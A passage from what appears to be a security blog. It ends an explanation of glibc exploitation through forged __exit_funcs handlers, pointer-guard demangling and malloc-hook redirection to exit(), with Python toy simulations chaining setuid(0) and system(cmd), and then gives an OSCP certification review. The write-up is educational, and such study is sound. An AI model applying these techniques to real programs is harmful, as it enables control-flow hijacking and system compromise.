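        flavor, mangled, arg, _dso = struct.unpack_from("<QQQQ", blob, 16 + 32 * idx)
        if flavor == EF_CXA:
            called.append((ror64(mangled, 0x11) ^ guard, arg))
    return called


# Made-up guard and addresses.
guard = 0x0123456789ABCDEF
setuid, system, cmd = 0x7FFFF7AD1330, 0x7FFFF7A52390, 0x602010
blob = build_fake_list([(setuid, 0), (system, cmd)], guard)
calls = replay(blob, guard)
print([(hex(f), hex(a)) for f, a in calls])
```

With this ordering the replay calls setuid(0) before system(cmd); whether the order matters depends on the target.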

Other (untested) ideas to get the pointer_guard?


There is probably another way to get that pointer_guard if you've got
an arbitrary infoleak. This may be possible through a pointer corruption,
a UAF, a type confusion or something else.
If the attacker somehow manages to find where 'tcbhead_t' is located
in memory, they may be able to just read the value out of it.

The last idea is probably far-fetched but let's look at it.
Let's say you've got a crash / no-crash oracle and that your process
is respawned through a fork().
You could probably use techniques similar to those used for blind ROP
to guess the pointer guard.
More research can be done there but we don't need it for now.

About glibc ptmalloc hooks


There may come a time when you somehow can't get a running program to exit,
because it runs in an infinite loop for example.

In order to use our previous technique, the process has to call
the libc exit() function.
This normally happens when the process prepares to exit.

We may be able to trigger that function before reaching the end of the program
by using glibc ptmalloc hooks.
Each of the glibc ptmalloc functions checks a function pointer and calls it
if it's not NULL.
By overwriting one of these hooks with the address of glibc exit()
and triggering the corresponding malloc(), free() or realloc() call,
we'll trigger the execution of our payload written in __exit_funcs.

These hooks are all exported symbols that you can easily get with
pwntools.elf.ELF : __free_hook, __malloc_hook, __realloc_hook and __memalign_hook.
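
The chain can be pictured with a toy model. This is plain Python, not glibc code: ToyLibc and its members are invented names that only mimic the control flow described above, where malloc() calls the hook with the requested size and a caller address when the hook is not NULL.

```python
class ToyLibc:
    """Very small model of the hook -> exit() -> handlers chain."""

    def __init__(self):
        self.malloc_hook = None   # stands in for __malloc_hook
        self.exit_funcs = []      # (func, arg) pairs, already demangled
        self.trace = []

    def exit(self, status, _caller=None):
        # Handlers run from the last slot to the first, then _exit(status).
        while self.exit_funcs:
            func, arg = self.exit_funcs.pop()
            func(arg, status)
        self.trace.append(("_exit", status))

    def malloc(self, size):
        hook = self.malloc_hook
        if hook is not None:
            return hook(size, "caller")      # the hook replaces the allocation
        self.trace.append(("real_malloc", size))
        return 0x1000                        # placeholder pointer


libc = ToyLibc()
libc.exit_funcs.append(
    (lambda arg, status: libc.trace.append(("system", arg)), 0x602010))

libc.malloc(24)                 # hook untouched: normal allocation
libc.malloc_hook = libc.exit    # the overwrite
libc.malloc(24)                 # now ends up in exit(24)
print(libc.trace)
```

In this model, as with the real malloc hook signature, the requested size ends up as the exit status, which is harmless for the payload since the ef_cxa handlers receive their own argument first.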

Conclusion


A full mitigation bypass is still possible nowadays on the latest
Linux distributions given the proper vulnerabilities and binary. Every technique
is applicable on a case-by-case basis.
Pointer mangling was implemented in order to make the exploitation of
destructor corruption harder, but as can be seen it's not impossible.

This technique is particularly useful when you don't know where the stack is
and full RELRO is enabled.
It allows you to do an easy version of ROP.

Cheers,

m_101

References


- The poisoned NUL byte, 2014 edition : https://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
- Pointer Encryption : https://sourceware.org/glibc/wiki/PointerEncryption


Friday, March 31, 2017

Yet Another OSCP Review

I just took the OSCP course and successfully passed the exam.
There are many other great reviews of the course out there, I just thought I'd add my grain of salt.

I decided to take that course as I wanted to see where I was at in terms of hacking and penetration testing skills. As some of you know, I've been more or less playing with code, hacks and exploits here and there for some time now.
So yeah, it was time for something a little bit more formal and still hands-on.

About the PWK - OSCP lab

This training is an introductory course to penetration testing.
It is not an easy certification, mainly due to the time that needs to be dedicated.

The lab is composed of a simulated company network; it is well thought out.
There are multiple sub-networks and dependencies between machines.


The goal is to hack and obtain administrator, SYSTEM or root privileges on as many machines as you can. You have no obligation to hack all the machines, but there are quite a lot of them which are interesting.

Machines run Linux, Windows or FreeBSD.
Vulnerabilities range from 2000 to the end of 2016.
You thus see a wide array of technologies, vulnerabilities and ways to hack into computers.

The course material consists of a PDF eBook and a couple of videos.
Apart from that, it's self-learning and sharing information on #offsec IRC or the forums. No information sharing about machines is tolerated though.

The staff is pretty helpful to confirm the track you're on without giving you anything that spoils the challenges.
They will help you and motivate you as long as you've shown that you worked hard and did the proper research.

Prerequisites


Several skills are recommended beforehand unless you want to really suffer:
- Linux and Windows command-line skills
- some basic scripting skills : some exploit modifications are required in the lab
- training on vulnhub VMs will make your experience smoother and better
- IT experience : networking, development or security
You could start from 0, but as some people who did say : they suffered even though they liked the course.
It is a HARD course for anyone starting in the field.
But it is necessary. There is no way around learning the hard way and suffering a little bit.

This is NOT an exploit development course, so you don't need to understand everything about assembly, buffer overflows or other exploitation techniques.
There are buffer overflows to exploit in the course, but these are explained step by step in enough detail for anyone taking the course to understand them.

My lab run

Pwning the lab

There are 30, 60 or 90-day packages, each including an exam attempt.

I took the 30-day package as I figured I'd extend by 30 days if necessary.
I ended up doing the whole lab in around 3 weeks and spent the remaining time on the lab report (150-300 pages depending on people).
Plan time for the lab report as access to the lab is necessary for some exercises.

I started my lab around the start of February and worked on it until the start of March.

I was clocking in around 10-15h/day; I had the opportunity to do the OSCP lab and exam full time, so I did.
In retrospect, it would have been better to take the 60-day package. It would have been a better balance.

The things that took most of my time were recon, enumeration and post-exploitation.
Some machines can't be exploited head-on: there are dependencies between machines, which students have to find by themselves.

Taking notes while rooting boxes saved me a ton of time.
I was rooting around 2-5 boxes a day.
The fastest took 10 minutes, the slowest 5-6h.
While pwning boxes, I had enumeration tools running (dirbuster, etc).

How to do it in such a limited time frame?

- have time to dedicate to the course
- be organized : exploits, notes, TTP (Tactics Techniques Procedures), etc
- run multiple scans in parallel in a staged fashion (nmap top 1000 ports then full ports while you're analyzing the first scan, multiple dirbusters running targeting multiple machines, etc)
- statically compiled tools (if you've played with pivots, you probably know why ;))
- go after low hanging fruits first
- keep proper notes about every important step you take
- do proper post-exploitation
- already have some experience
- Ask yourself the right questions. Don't blindly follow "exploitation guides", "penetration guides" or "privilege escalation guides". Ask yourself what the objectives and goals of each described step are.

How much time should I take?

This is really subjective.
I'll base these approximations on what people told me on IRC.
For someone with pentesting experience, who has pwned quite a few boxes and has time after work, I'd say 30-60 days.
For someone with a good development background and some time after work, 3-6 months.
For someone with no IT skills, 1-3 years.

The most important things are motivation and the time you can dedicate every day to the course.
This is why this certification is hard : it will take your time, and you need caring people and external distractions from time to time.

Use automated scripts or not?

I typed every single command by hand; there are multiple reasons for that:
- faster : automated scripts are great but they run scans that can be useless in the end. For instance, if you managed to find a flaw resulting in Remote Code Execution in the web app you found ... What use is there in running dirb, nikto, snmpwalk or SMB NULL enumeration?
Once access is gained, 'netstat' and file enumeration are faster and better "port scanners" and "version probers".
- automated scripts are not for speed, they are for consistency. Consistent attacks can probably be fingerprinted and attack patterns extracted.
- automated scripts are super noisy, and you can rarely fine-tune the details
- better memorization
- better tool understanding (and thus better adaptation, not depending on a single tool)
- I can't allow a tool to interpret data for me without being able to check the raw data myself. Having interpreted data AND raw data is really important; vulnerabilities can be in the details.

Other tips?

Getting good at hacking or pentesting is not all about the technical part.
Take breaks, go run, see friends, have beers, have a balanced life while doing the certification.
This certification sure is addictive, so be careful.

About the OSCP exam

The exam is hard, not for technical reasons but because of its duration, in my opinion. I'll come back to that later.
If you try the exam, it means you're more or less ready to validate your technical skills and knowledge.

The exam includes 5 machines to hack.
Each machine is worth from 10 to 25 points.
10 points being the easiest and 25 points the hardest.
You need 70 points to pass the certification.

It is subjective: depending on your skillset, the 25-point machines may be easy for you.

About the duration : you've got 23h45 to complete the exam.
It looks like a long time, but hours do burn fast.

My exam run

A 0.5 box is an access obtained with low privileges.
A 1 box is an access obtained with full privileges.

The duration is the really hard part.
After some time, you also get tunnel vision and you get pretty tired. So take breaks.

Before the exam:
- a step back from hacking
- beers with friends
- going out a little bit
- some rest
It helps to disconnect from the subject to avoid tunnel vision.

So what I prepared:
- a super clean and tidy room and environment
- lots of food and drinks
- breaks and naps
- No coffee, red bull or whatever substances that people use in order to stay awake. It's a trap as you won't be able to have efficient naps. Naps were ultra super helpful.

Attacking machine:
- a clean and fully updated and configured Kali VM
- CherryTree for note taking
- crackmapexec for popping shells (exploit/* modules can't be used in the exam, only multi/handler)
- metasploit multi/handler
- SecLists
- GIMP for cropping screenshots
- remmina for RDP
- a bunch of other stuff

I had 2 attempts.
In both attempts, I did not use any metasploit exploit, auxiliary or post modules.

1st attempt

In retrospect I could have passed on the 1st try, and here are my main mistakes:
- not following my intuition : "this smells vulnerable". Almost at the end of the exam, I quickly got a low privilege shell on one of the boxes I was stuck on
- not rested enough before the exam
- too many tabs open in my browser : close them regularly

I failed for non technical reasons.
Don't take a fail as a failure but as a learning experience to further improve yourself for next time.

2nd attempt

Unfortunately, I got sick during the 48h preceding my scheduled exam time.
According to Offensive Security rules, no cancellation or rescheduling is possible during that time. So I just went on with it.
I can say that it was really painful, between being tired, sick and coughing during the exam, but I managed to get it.

After 4-5h + 1h (lunch) + 4-5h I had 1.5 boxes and was still poking around for recon and enumeration. I thought I was doomed.
I went to sleep for 4h, woke up, got some dinner and got 2.5 boxes in 5h. I had 4 boxes, enough to pass the exam.

Stuck on the 5th box, I tried to sleep for 2-3h, but ended up reading, playing games, googling, watching the latest episode of "The Flash", making sure my notes and screenshots were neat, and taking a small power nap.

Went back to the 5th box, couldn't gain access.
In the end, exhausted, I stopped around 3h before the end of the exam and went to sleep.

So during those 23h45, I got around 7h of sleep split in 2, 15h of challenge time and 2h for entertainment and food, with refreshments during the whole exam. Those are approximations.

The next day I wrote my report and came up with a hypothesis as to how to root the last box. This hypothesis stemmed from the feeling "IT IS vuln there" I had while attempting to root the 5th box.

The day after (today), I got the email with the "pass" result. It was such a relief that I could go back to a normal life again.
I'll wait some time before attempting OSCE, hopefully before the end of the year.

Conclusion

Everyone would say "try harder" but not everyone knows what it means.

Try harder is the embodiment of the following:
- keep at it
- be persistent
- recon, enumerate as much as you can
- research and research more
- ask yourself the proper questions and don't run tools blindly
- have a deep understanding of what's happening under the hood
"Try harder AND smarter."

I mostly learned:
- be better organized for note taking, screenshots, etc
- better pivoting and file transfer tricks
- improved methodologies and intuition

It was a nerve-racking certification.
The most nerve-racking part was probably just before submitting the final exam report. I spent a LOT of time checking and rechecking that nothing was missed.

Anyone can do it.
It is not as hard as everyone says it is (impossible, etc).
It is not an easy certification though.
If you work hard, are persistent and really keep at it, you'll end up getting it.
Don't be discouraged by people saying it's super hard or almost impossible to get. If you really really really want something and do something about it, then you'll get it.
You will end up having acquired hands-on, practical skills that are actionable in the real world.
This is not some theoretical useless certification.

In all, it was an interesting and gratifying experience.
It was a really fun course if you like rooting boxes like I do.

Stay humble, work hard, be positive and keep at it :).

Good luck to anyone trying to pass that certification.